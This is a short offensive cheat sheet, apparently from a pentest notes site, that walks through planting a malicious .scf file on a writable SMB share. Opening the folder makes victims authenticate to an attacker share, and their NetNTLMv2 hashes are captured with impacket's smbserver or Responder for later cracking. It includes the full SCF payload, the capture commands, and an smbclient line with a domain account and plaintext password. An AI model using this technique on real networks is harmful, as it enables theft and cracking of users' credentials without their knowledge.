SCF Files
Imagine we have write permission to a shared folder, we could use it to save a .scf file, trick a user to access it and obtain its NetNTLMv2 hash. If its password is weak, we could obtain the plain text of it.
Access to Shared Folder
smbclient //10.10.10.10/payroll-2024 -U 'freed-om-corp.com\carlos.villamizar%NastAsya4475'
Create SCF file
[Shell]
Command=2
IconFile=\\10.10.10.20\mycompartida\quepasomirey.ico
[Taskbar]
Command=ToggleDesktop
Upload SCF file to Shared Folder


Serve the attacker Shared Folder
python3 /opt/impacket/examples/smbserver.py mycompartida $(pwd) -smb2support
And now we need to wait for an interaction with the payroll-2024 shared folder.
Waiting... ANDD if someone is interacting with the folder we will receive a NetNTLMv2 hash in our mycompartida shared folder.

Or using Responder.py
sudo python3 Responder.py -I eth0
Wait and once we detect an interaction with the folder:

Last updated